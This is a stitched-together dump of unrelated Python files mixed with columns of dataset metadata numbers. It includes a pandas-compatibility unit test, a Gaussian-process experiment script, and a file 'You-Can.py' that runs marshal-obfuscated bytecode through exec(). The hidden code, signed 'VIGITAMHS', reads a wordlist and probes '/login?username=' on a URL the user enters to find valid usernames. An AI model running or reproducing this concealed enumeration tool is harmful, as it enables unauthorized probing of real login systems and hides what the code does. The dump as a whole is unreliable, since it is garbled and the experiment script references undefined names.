from .contract_abis_statements import *
| 30.8
| 40
| 0.844156
| 21
| 154
| 5.761905
| 0.428571
| 0.396694
| 0.528926
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103896
| 154
| 4
| 41
| 38.5
| 0.876812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
965639b56a0c354898c0ebfaeb987a83f421f419
| 8,951
|
py
|
Python
|
kats/tests/compat/test_pandas.py
|
utkucanaytac/Kats
|
9781615750a2f3b49f16cccf335b5c29fdfd181a
|
[
"MIT"
] | null | null | null |
kats/tests/compat/test_pandas.py
|
utkucanaytac/Kats
|
9781615750a2f3b49f16cccf335b5c29fdfd181a
|
[
"MIT"
] | null | null | null |
kats/tests/compat/test_pandas.py
|
utkucanaytac/Kats
|
9781615750a2f3b49f16cccf335b5c29fdfd181a
|
[
"MIT"
] | null | null | null |
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import inspect
import unittest
from typing import Any, Dict
from unittest.mock import ANY, patch
import pandas as pd
from kats.compat import compat, pandas
class TestPandas(unittest.TestCase):
assert_frame_equal_args: Dict[str, Any] = {}
assert_series_equal_args: Dict[str, Any] = {}
assert_index_equal_args: Dict[str, Any] = {}
def setUp(self) -> None:
for method in (
"assert_frame_equal",
"assert_series_equal",
"assert_index_equal",
):
args = {}
setattr(self, f"{method}_args", args)
for k in inspect.signature(getattr(pandas, method)).parameters:
if k not in {"left", "right"}:
args[k] = ANY
def test_version(self) -> None:
self.assertTrue(pandas.version == compat.Version("pandas"))
@patch("kats.compat.pandas.version", compat.Version("1.0"))
@patch("kats.compat.pandas.pdt.assert_frame_equal")
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
def test_assert_frame_equal_10(self, assert_frame_equal: Any) -> None:
assert_frame_equal.return_value = False
df = pd.DataFrame()
result = pandas.assert_frame_equal(
df, df, check_less_precise=2, check_flags=False, check_freq=False, rtol=0.5
)
self.assertFalse(result)
args = dict(self.assert_frame_equal_args)
args["check_less_precise"] = 2
# drop args from other versions
del args["rtol"]
del args["atol"]
del args["check_freq"]
del args["check_flags"]
assert_frame_equal.assert_called_once_with(df, df, **args)
@patch("kats.compat.pandas.version", compat.Version("1.1"))
@patch("kats.compat.pandas.pdt.assert_frame_equal")
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
def test_assert_frame_equal_11(self, assert_frame_equal: Any) -> None:
assert_frame_equal.return_value = False
df = pd.DataFrame()
result = pandas.assert_frame_equal(
df, df, check_less_precise=2, check_flags=False, rtol=0.001
)
self.assertFalse(result)
args = dict(self.assert_frame_equal_args)
args["rtol"] = 0.001
# drop args from other versions
del args["check_less_precise"]
del args["check_flags"]
assert_frame_equal.assert_called_once_with(df, df, **args)
@patch("kats.compat.pandas.version", compat.Version("1.2"))
@patch("kats.compat.pandas.pdt.assert_frame_equal")
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
def test_assert_frame_equal_12(self, assert_frame_equal: Any) -> None:
assert_frame_equal.return_value = False
df = pd.DataFrame()
result = pandas.assert_frame_equal(df, df, check_less_precise=2, rtol=0.001)
self.assertFalse(result)
args = dict(self.assert_frame_equal_args)
# drop args from other versions
del args["check_less_precise"]
args["rtol"] = 0.001
assert_frame_equal.assert_called_once_with(df, df, **args)
@patch("kats.compat.pandas.version", compat.Version("1.0"))
@patch("kats.compat.pandas.pdt.assert_index_equal")
@patch("kats.compat.pandas.pdt.assert_series_equal")
def test_assert_series_equal_10(
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
self, assert_series_equal: Any, assert_index_equal: Any
) -> None:
assert_series_equal.return_value = False
s = pd.Series(dtype=int)
result = pandas.assert_series_equal(
s, s, check_less_precise=2, check_flags=False, check_freq=False, rtol=0.5
)
self.assertFalse(result)
args = dict(self.assert_series_equal_args)
args["check_less_precise"] = 2
# drop args from other versions
del args["check_category_order"]
del args["check_freq"]
del args["check_flags"]
del args["rtol"]
del args["atol"]
del args["check_index"]
assert_series_equal.assert_called_once_with(s, s, **args)
@patch("kats.compat.pandas.version", compat.Version("1.0.2"))
@patch("kats.compat.pandas.pdt.assert_index_equal")
@patch("kats.compat.pandas.pdt.assert_series_equal")
def test_assert_series_equal_102(
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
self, assert_series_equal: Any, assert_index_equal: Any
) -> None:
# Check that on pandas 1.0.2, `check_less_precise` is passed and not later args
assert_series_equal.return_value = False
s = pd.Series(dtype=int)
result = pandas.assert_series_equal(
s,
s,
check_less_precise=2,
check_category_order=True,
check_flags=False,
check_freq=False,
rtol=0.5,
)
self.assertFalse(result)
args = dict(self.assert_series_equal_args)
args["check_less_precise"] = 2
args["check_category_order"] = True
# drop args from other versions
del args["check_freq"]
del args["check_flags"]
del args["rtol"]
del args["atol"]
del args["check_index"]
assert_series_equal.assert_called_once_with(s, s, **args)
@patch("kats.compat.pandas.version", compat.Version("1.1"))
@patch("kats.compat.pandas.pdt.assert_index_equal")
@patch("kats.compat.pandas.pdt.assert_series_equal")
def test_assert_series_equal_11(
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
self, assert_series_equal: Any, assert_index_equal: Any
) -> None:
# Check that on pandas 1.1, `check_less_precise` is passed and not later args
assert_series_equal.return_value = False
s = pd.Series(dtype=int)
result = pandas.assert_series_equal(
s,
s,
check_less_precise=2,
check_category_order=True,
check_flags=False,
check_freq=False,
rtol=0.5,
)
self.assertFalse(result)
args = dict(self.assert_series_equal_args)
args["check_category_order"] = True
args["check_freq"] = False
args["rtol"] = 0.5
# drop args from other versions
del args["check_less_precise"]
del args["check_flags"]
del args["check_index"]
assert_series_equal.assert_called_once_with(s, s, **args)
@patch("kats.compat.pandas.version", compat.Version("1.2"))
@patch("kats.compat.pandas.pdt.assert_index_equal")
@patch("kats.compat.pandas.pdt.assert_series_equal")
def test_assert_series_equal_12(
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
self, assert_series_equal: Any, assert_index_equal: Any
) -> None:
# Check that on pandas 1.2, `check_less_precise` is not passed and not later args
assert_series_equal.return_value = False
s = pd.Series(dtype=int)
result = pandas.assert_series_equal(
s,
s,
check_less_precise=2,
check_category_order=True,
check_flags=False,
check_freq=False,
rtol=0.5,
)
self.assertFalse(result)
args = dict(self.assert_series_equal_args)
args["check_category_order"] = True
args["check_freq"] = False
args["check_flags"] = False
args["rtol"] = 0.5
# drop args from other versions
del args["check_less_precise"]
del args["check_index"]
assert_series_equal.assert_called_once_with(s, s, **args)
@patch("kats.compat.pandas.version", compat.Version("1.3"))
@patch("kats.compat.pandas.pdt.assert_index_equal")
@patch("kats.compat.pandas.pdt.assert_series_equal")
def test_assert_series_equal_13(
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
self, assert_series_equal: Any, assert_index_equal: Any
) -> None:
assert_series_equal.return_value = False
s = pd.Series(dtype=int)
result = pandas.assert_series_equal(
s,
s,
check_less_precise=2,
check_category_order=True,
check_flags=False,
check_freq=False,
rtol=0.5,
check_index=False,
)
self.assertFalse(result)
args = dict(self.assert_series_equal_args)
args["check_category_order"] = True
args["check_freq"] = False
args["check_flags"] = False
args["rtol"] = 0.5
args["check_index"] = False
# drop args from other versions
del args["check_less_precise"]
assert_series_equal.assert_called_once_with(s, s, **args)
if __name__ == "__main__":
unittest.main()
| 38.416309
| 89
| 0.634566
| 1,168
| 8,951
| 4.605308
| 0.100171
| 0.082543
| 0.116936
| 0.081986
| 0.873768
| 0.861684
| 0.852389
| 0.852389
| 0.846068
| 0.841049
| 0
| 0.014116
| 0.256061
| 8,951
| 232
| 90
| 38.581897
| 0.793663
| 0.119316
| 0
| 0.746114
| 0
| 0
| 0.170887
| 0.094923
| 0
| 0
| 0
| 0.00431
| 0.378238
| 1
| 0.051813
| false
| 0
| 0.031088
| 0
| 0.103627
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
966b5dc82a242f3d339736d5c5830bf7e337f437
| 104
|
py
|
Python
|
FastAPISQLAlchamyGraphQL/app/conf/__init__.py
|
scionoftech/FastAPI-Full-Stack-Samples
|
e7d42661ed59324ff20f419d05c6cd1e7dab7e97
|
[
"MIT"
] | 29
|
2021-03-31T02:42:59.000Z
|
2022-03-12T16:20:05.000Z
|
FastAPISQLAlchamy/app/conf/__init__.py
|
scionoftech/FastAPI-Full-Stack-Samples
|
e7d42661ed59324ff20f419d05c6cd1e7dab7e97
|
[
"MIT"
] | null | null | null |
FastAPISQLAlchamy/app/conf/__init__.py
|
scionoftech/FastAPI-Full-Stack-Samples
|
e7d42661ed59324ff20f419d05c6cd1e7dab7e97
|
[
"MIT"
] | 4
|
2021-08-21T01:02:00.000Z
|
2022-01-09T15:33:51.000Z
|
from .config import ProjectSettings
from .config import DBSettings
from .config import EmailSettings
| 26
| 36
| 0.826923
| 12
| 104
| 7.166667
| 0.5
| 0.348837
| 0.55814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144231
| 104
| 3
| 37
| 34.666667
| 0.966292
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fb6108fcd422c819e467bf6cffe636b88988ac98
| 182
|
py
|
Python
|
parser/generation/generation.py
|
zhangshyue/regex-library
|
69a26b580bcc94f95dda3536cd790fb59c81a31b
|
[
"MIT"
] | null | null | null |
parser/generation/generation.py
|
zhangshyue/regex-library
|
69a26b580bcc94f95dda3536cd790fb59c81a31b
|
[
"MIT"
] | null | null | null |
parser/generation/generation.py
|
zhangshyue/regex-library
|
69a26b580bcc94f95dda3536cd790fb59c81a31b
|
[
"MIT"
] | null | null | null |
# Internal imports
from extraction.extraction import FoundExpression
def generate(parsed_expression, exp: FoundExpression):
# Write the actual data out to a PB message
pass
| 26
| 54
| 0.785714
| 23
| 182
| 6.173913
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.17033
| 182
| 7
| 55
| 26
| 0.940397
| 0.318681
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
83a18c57e22ae39b6567b0bc0c30dc882c14c7f5
| 433
|
py
|
Python
|
tests/internal/encryption_support/test_encryption_support_unsupported_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/encryption_support/test_encryption_support_unsupported_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/encryption_support/test_encryption_support_unsupported_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | 1
|
2021-12-15T11:58:22.000Z
|
2021-12-15T11:58:22.000Z
|
# Testing module encryption_support.unsupported
import pytest
import ec2_compare.internal.encryption_support.unsupported
def test_get_internal_data_encryption_support_unsupported_get_instances_list():
assert len(ec2_compare.internal.encryption_support.unsupported.get_instances_list()) > 0
def test_get_internal_data_encryption_support_unsupported_get():
assert len(ec2_compare.internal.encryption_support.unsupported.get) > 0
| 43.3
| 90
| 0.877598
| 56
| 433
| 6.339286
| 0.339286
| 0.287324
| 0.473239
| 0.349296
| 0.828169
| 0.828169
| 0.625352
| 0.625352
| 0.625352
| 0
| 0
| 0.012285
| 0.060046
| 433
| 9
| 91
| 48.111111
| 0.859951
| 0.103926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
79193a1a6434b81833234d4905a806bc2b445431
| 180
|
py
|
Python
|
custom/icds_reports/utils/connections.py
|
tobiasmcnulty/commcare-hq
|
234aa1fba98a96de1b625bbd70b2066fc877eed1
|
[
"BSD-3-Clause"
] | 1
|
2020-07-14T13:00:23.000Z
|
2020-07-14T13:00:23.000Z
|
custom/icds_reports/utils/connections.py
|
tobiasmcnulty/commcare-hq
|
234aa1fba98a96de1b625bbd70b2066fc877eed1
|
[
"BSD-3-Clause"
] | null | null | null |
custom/icds_reports/utils/connections.py
|
tobiasmcnulty/commcare-hq
|
234aa1fba98a96de1b625bbd70b2066fc877eed1
|
[
"BSD-3-Clause"
] | null | null | null |
from corehq.sql_db.connections import get_db_alias_or_none, ICDS_UCR_CITUS_ENGINE_ID
def get_icds_ucr_citus_db_alias():
return get_db_alias_or_none(ICDS_UCR_CITUS_ENGINE_ID)
| 30
| 84
| 0.872222
| 34
| 180
| 3.970588
| 0.5
| 0.155556
| 0.266667
| 0.177778
| 0.533333
| 0.533333
| 0.533333
| 0.533333
| 0.533333
| 0.533333
| 0
| 0
| 0.083333
| 180
| 5
| 85
| 36
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
f7038372acea8564b8305e0beb5f6d7f87ed3aa9
| 6,454
|
py
|
Python
|
experiments/increasing_dim/Exp_1/kron.py
|
vdutor/VFF
|
459be5b480bba49e8c15dc7daeca5fd1ddd762df
|
[
"Apache-2.0"
] | 75
|
2016-11-21T21:50:12.000Z
|
2022-03-22T17:56:36.000Z
|
experiments/increasing_dim/Exp_1/kron.py
|
vdutor/VFF
|
459be5b480bba49e8c15dc7daeca5fd1ddd762df
|
[
"Apache-2.0"
] | 4
|
2018-03-22T19:47:08.000Z
|
2021-10-06T14:49:54.000Z
|
experiments/increasing_dim/Exp_1/kron.py
|
vdutor/VFF
|
459be5b480bba49e8c15dc7daeca5fd1ddd762df
|
[
"Apache-2.0"
] | 26
|
2016-11-22T14:14:58.000Z
|
2022-02-03T18:29:20.000Z
|
import numpy as np
import sys
import gpflow
import VFF
from time import time
from config import *
dim = sys.argv[1]
rep = sys.argv[2]
print('vff: dimension {}, replicate {}'.format(dim, r))
# data
data = np.load('data/data_dim{}_rep{}.npz'.format(dim, 0))
# full_gp
def prodkern(dim):
return gpflow.kernels.Prod([gpflow.kernels.Matern32(1, active_dims=[i], lengthscales=lengthscale)
for i in range(dim)])
k = prodkern(dim)
m = gpflow.gpr.GPR(data['Xtrain'], data['Ytrain'], kern=k)
m.likelihood.variance = noise_var
data = np.load('data/data_dim{}_rep{}.npz'.format(dim, r))
marg_lik = m.compute_log_likelihood().squeeze()
mean_log_pred = np.mean(m.predict_density(data['Xtest'], data['Ytest']))
file = open("results/full.csv","a")
file.write("{}, {}, {}, {}".format(dim, rep, marg_lik, mean_log_pred))
file.close()
##########################
# kron
results = pd.DataFrame()
for dim in dimensions:
a, b = -1.5 * np.ones(dim), 1.5 * np.ones(dim)
k = prodkern(dim)
for r in range(repeats):
print('kron replicate ',r,'/',repeats)
data = np.load('data/data_dim{}_rep{}.npz'.format(dim, r))
for M in num_freqs:
if (2*M-1)**dim:
a, b = -0.5 * np.ones(dim), 1.5 * np.ones(dim)
m = VFF.vgp.VGP_kron(data['Xtrain'], data['Ytrain'], np.arange(M), a, b,
kerns=prodkern(dim).kern_list,
likelihood=gpflow.likelihoods.Gaussian(),
use_two_krons=True)
m.likelihood.variance = noise_var
# only optimize q(u)
m.kerns.fixed = True
m.likelihood.fixed = True
start = time()
m.optimize()
marg_lik = m.compute_log_likelihood().squeeze()
mean_log_pred = np.mean(m.predict_density(data['Xtest'], data['Ytest']))
t = time() - start
results = results.append(dict(dim=dim, rep=r, marg_lik=marg_lik,
mean_log_pred=mean_log_pred, time=t,
num_inducing=M),
ignore_index=True)
# do this inside the loop so we can get partial results if something crashes
results.to_csv('results/kron.csv')
##########################
# kron_opt
results = pd.DataFrame()
for dim in dimensions:
a, b = -1.5 * np.ones(dim), 1.5 * np.ones(dim)
k = prodkern(dim)
for r in range(repeats):
print('kron_opt replicate ',r,'/',repeats)
data = np.load('data/data_dim{}_rep{}.npz'.format(dim, r))
for M in num_freqs:
if (2*M-1)**dim:
m = VFF.vgp.VGP_kron(data['Xtrain'], data['Ytrain'], np.arange(M), a, b,
kerns=k.kern_list,
likelihood=gpflow.likelihoods.Gaussian(),
use_two_krons=True)
m.likelihood.variance = noise_var
# build kronecker GP model
start = time()
m.optimize()
marg_lik = m.compute_log_likelihood().squeeze()
mean_log_pred = np.mean(m.predict_density(data['Xtest'], data['Ytest']))
t = time() - start
results = results.append(dict(dim=dim, rep=r, marg_lik=marg_lik,
mean_log_pred=mean_log_pred, time=t,
num_inducing=M),
ignore_index=True)
results.to_csv('results/kron_opt.csv')
##########################
# Sparse
results = pd.DataFrame()
for dim in dimensions:
for r in range(repeats):
print('Sparse replicate ',r,'/',repeats)
data = np.load('data/data_dim{}_rep{}.npz'.format(dim, r))
num_inducing = (2*num_freqs-1)**dim
for M in num_inducing:
if M < 500:
# build sparse GP model
Z = KMeans(n_clusters=M).fit(data['Xtrain']).cluster_centers_
m = gpflow.sgpr.SGPR(data['Xtrain'], data['Ytrain'], Z=Z, kern=prodkern(dim))
m.likelihood.variance = noise_var
start = time()
marg_lik = m.compute_log_likelihood().squeeze()
mean_log_pred = np.mean(m.predict_density(data['Xtest'], data['Ytest']))
t = time() - start
results = results.append(dict(dim=dim, rep=r, marg_lik=marg_lik,
mean_log_pred=mean_log_pred, time=t,
num_inducing=M),
ignore_index=True)
# do this inside the loop so we can get partial results if something crashes
results.to_csv('results/sparse_kmeans.csv')
##########################
# Sparse GP opt
results = pd.DataFrame()
for dim in dimensions:
for r in range(repeats):
print('sparse opt replicate ',r,'/',repeats)
data = np.load('data/data_dim{}_rep{}.npz'.format(dim, r))
num_inducing = (2*num_freqs-1)**dim
for M in num_inducing:
if M < 500:
# build sparse GP model
Z = KMeans(n_clusters=M).fit(data['Xtrain']).cluster_centers_
m = gpflow.sgpr.SGPR(data['Xtrain'], data['Ytrain'], Z=Z, kern=prodkern(dim))
m.likelihood.variance = noise_var
# only optimize Z
m.kern.fixed = True
m.likelihood.fixed = True
start = time()
m.optimize()
marg_lik = m.compute_log_likelihood().squeeze()
mean_log_pred = np.mean(m.predict_density(data['Xtest'], data['Ytest']))
t = time() - start
results = results.append(dict(dim=dim, rep=r, marg_lik=marg_lik,
mean_log_pred=mean_log_pred, time=t,
num_inducing=M),
ignore_index=True)
# do this inside the loop so we can get partial results if something crashes
results.to_csv('results/sparse_opt.csv')
##########################
#
| 37.523256
| 101
| 0.503719
| 775
| 6,454
| 4.046452
| 0.165161
| 0.03125
| 0.049107
| 0.026786
| 0.85236
| 0.829401
| 0.829401
| 0.821747
| 0.819834
| 0.814094
| 0
| 0.007694
| 0.355593
| 6,454
| 171
| 102
| 37.74269
| 0.746333
| 0.058413
| 0
| 0.741379
| 0
| 0
| 0.083137
| 0.033221
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008621
| false
| 0
| 0.051724
| 0.008621
| 0.068966
| 0.043103
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f75efe55e0752308a88d8a370ac20d517a61aa6c
| 3,481
|
py
|
Python
|
You-Can.py
|
suliman3177/kingusa123
|
6cd83198f6c42184c584bdf1a96a3167ddf2a71d
|
[
"MIT"
] | null | null | null |
You-Can.py
|
suliman3177/kingusa123
|
6cd83198f6c42184c584bdf1a96a3167ddf2a71d
|
[
"MIT"
] | null | null | null |
You-Can.py
|
suliman3177/kingusa123
|
6cd83198f6c42184c584bdf1a96a3167ddf2a71d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3 -B
#coded By :VIGITMHS
#iam not Hacker
import marshal as m
data = m.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00@\x00\x00\x00s\xc0\x00\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x02l\x02m\x03Z\x03\x01\x00d\x03Z\x04d\x04Z\x05d\x05Z\x06d\x06Z\x07d\x07Z\x08e\x03Z\te\tj\nd\x08d\td\nd\x0bd\x0cd\rd\x0ed\x0fg\x04d\x10d\x11\x8d\x06\x01\x00e\x01\xa0\x0bd\x12\xa1\x01\x01\x00d\x13Z\x0ce\re\x08e\x0c\x17\x00\x83\x01\x01\x00e\x0ed\x14d\x15\x83\x02Z\x0fe\x10e\x04d\x16\x17\x00\x83\x01Z\x11e\x0fD\x00]4Z\x12e\x00\xa0\x13e\x11d\x17\x17\x00e\x12\xa0\x14d\x18\xa1\x01\x17\x00\xa1\x01Z\x15e\x15d\x19k\x02r\x86e\rd\x1ae\x15\x17\x00d\x1b\x17\x00\x83\x01\x01\x00q\x86d\x01S\x00)\x1c\xe9\x00\x00\x00\x00N)\x01\xda\tAnimationz\x07\x1b[0;32mz\x07\x1b[0;30mz\x07\x1b[0;33mz\x07\x1b[0;34mz\x07\x1b[1;30mz\tLoding...z\x03WL#z\x02W#\xfa\x01 \xfa\x01/\xfa\x01-\xfa\x01\\\xfa\x01|g\x9a\x99\x99\x99\x99\x99\xc9?)\x06\xda\x02AT\xda\x03CUT\xda\x03CLT\xda\x04text\xda\x07Loading\xda\x01t\xda\x05cleara{\x06\x00\x00\n .-""""-.\n / ;\n $$P :\n .m._ $ VIGITAMHS:\n dSMMSSSss.__$$b. __ :\n :MMSMMSSSMMMSS$$$b $$P ;\n SMMMSMMSMMMSSS$$$$ :b\n dSMMMSMMMMMMSSMM$$$b.dP SSb.\n dSMMMMMMMMMMSSMMPT$$=-. /TSSSS.\n :SMMMSMMMMMMMSMMP `$b_.\' MMMMSS.\n SMMMMMSMMMMMMMMM \\ .\'\\ :SMMMSSS.\n dSMSSMMMSMMMMMMMM \\/\\_/; .\'SSMMMMSSSm\n dSMMMMSMMSMMMMMMMM :.;\'" :SSMMMMSSMM;\n .MMSSSSSMSSMMMMMMMM; :.; MMSMMMMSMMM;\n dMSSMMSSSSSSSMMMMMMM; ;.; MMMMMMMSMMM\n:MMMSSSSMMMSSP^TMMMMM ;.; MMMMMMMMMMM\nMMMSMMMMSSSSP `MMMM ;.; :MMMMMMMMM;\n"TMMMMMMMMMM TM; :`.: MMMMMMMMM;\n )MMMMMMM; _/\\ :`.: :MMMMMMMM\n d$SS$$$MMMb. |._\\ :`.: MMMMMMMM\n T$$S$$$$$$$$$$m;O\\"-;`.:_.- MMMMMMM;\n :$$$$$$$$$$$$$$$b_l./\\ ;`.: mMMSSMMM;\n :$$$$$$$$$$$$$$$$$$$./\\;`.: .$$MSMMMMMM\n $$$$$$$$$$$$$$$$$$$$. \\`.:.$$$$SMSSSMMM;\n $$$$$$$$$$$$$$$$$$$$$. \\.:$$$$$SSMMMMMMM\n :$$$$$$$$$$$$$$$$$$$$$.//.:$$$$SSSSSSSMM;\n :$$$$$$$$$$$$$$$$$$$$$$.`.:$$SSSSSSSMMMP\n $$$$$$$$$;"^$J "^$$$$;.`.$$P `SSSMMMM\n :$$$$$$$$$ :$$$;.`.P\'.. TMMM$$b\n :$$$$$$$$$; $$$$;.`/ c^\' d$$$$$S;\n $$$$$S$$$$; \'^^^:_d$g:___.$$$$$$SSS\n $$$$SS$$$$;coded by $$$$$$$$$$$$$$SSS;\n :$$$SSSS$$$$=>VIGITAMHS : $$$$$$$$$$$$$SSS\n :$P"TSSSS$$$ ; $$$$$$$$$$$$$SSS;\n j `SSSSS$ : :$$$$$$$$$$$$$SS$\n : "^S^\' : $$$$$$$$$$$$$S$;\n ;.____.-;" "--^$$$$$$$$$$$$$P\n \'-....-" ""^^T$$$$P"\n [+] - my channel in telegram:\n =>https://t.me/ERROR404VIGITAMHS\n z\rvigitamhs.txt\xda\x01rz\x0eEnter A url==>z\x10/login?username=\xda\x01\nz\x19http://1.1.1.1.com/statusz\tFound => z\x08 Found !)\x16\xda\x08requests\xda\x02os\xda\x0eN4Tools.Designr\x02\x00\x00\x00\xda\x01G\xda\x01R\xda\x01Y\xda\x01B\xda\x02Bl\xda\x01A\xda\x04Text\xda\x06systemZ\x02Bs\xda\x05print\xda\x04openZ\x06vigita\xda\x05inputZ\x03mhs\xda\x01m\xda\x03get\xda\x06rstripr\x0f\x00\x00\x00\xa9\x00r"\x00\x00\x00r"\x00\x00\x00\xfa\x0b<N404-Tool>\xda\x08<module>\x01\x00\x00\x00s2\x00\x00\x00\x08\x01\x08\x01\x0c\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x02\x01\x02\x01\x02\x01\x02\x01\n\x01\x02\xfa\x06\x08\n\x01\x04*\x0c\x01\n\x02\x0c\x01\x08\x01\x18\x01\x08\x01')
exec (data)
| 580.166667
| 3,390
| 0.559322
| 516
| 3,481
| 3.736434
| 0.428295
| 0.102697
| 0.102697
| 0.093361
| 0.099585
| 0.076245
| 0.076245
| 0.063797
| 0.048237
| 0.048237
| 0
| 0.181118
| 0.141913
| 3,481
| 6
| 3,391
| 580.166667
| 0.464346
| 0.014938
| 0
| 0
| 0
| 0.666667
| 0.683304
| 0.392294
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
f760c218e50b9c6a0ae0262311f284f08a5ff5d8
| 3,488
|
py
|
Python
|
cgi-bin/tools/shapes.py
|
quartzcms/Learning-Bot
|
2ca01ce3bfe724f82681b86d79570c3665bc0541
|
[
"MIT"
] | 2
|
2019-03-17T02:51:44.000Z
|
2019-11-24T02:44:09.000Z
|
cgi-bin/tools/shapes.py
|
quartzcms/Learning-Bot
|
2ca01ce3bfe724f82681b86d79570c3665bc0541
|
[
"MIT"
] | null | null | null |
cgi-bin/tools/shapes.py
|
quartzcms/Learning-Bot
|
2ca01ce3bfe724f82681b86d79570c3665bc0541
|
[
"MIT"
] | null | null | null |
import sys
import cgi
import os
class Shapes():
def __init__(self, form, output):
self.form = form
self.output = output
def ovale(self, grid, size, pointsWH):
x = (size[0] // 5)
for i, array in enumerate(grid):
spacing_height = round(((pointsWH[1][1] - pointsWH[1][0]) / 2) - (size[1] / 2))
bottom_side = round(spacing_height + size[1] + pointsWH[1][0])
top_side = round(spacing_height + pointsWH[1][0])
if i >= top_side and i <= bottom_side:
if i == round(top_side + (size[1] / 2)):
x = (size[0] // 5)
for j, value in enumerate(array):
spacing_width = round(((pointsWH[0][1] - pointsWH[0][0]) / 2) - (size[0] / 2))
right_side = round(spacing_width + size[0] + pointsWH[0][0])
left_side = round(spacing_width + pointsWH[0][0])
if i >= round(top_side + (size[1] / 2)):
x_side_left = round(left_side + x)
x_side_right = round(right_side - x)
else:
x_side_left = round((left_side + (size[0] / 2)) - x)
x_side_right = round((left_side + (size[0] / 2)) + x)
if j >= left_side and j <= right_side and j >= x_side_left and j <= x_side_right:
grid[i][j] = '1'
x += (size[0] // 5)
return grid
def triangle_up(self, grid, size, pointsWH):
x = 1
for i, array in enumerate(grid):
spacing_height = round(((pointsWH[1][1] - pointsWH[1][0]) / 2) - (size[1] / 2))
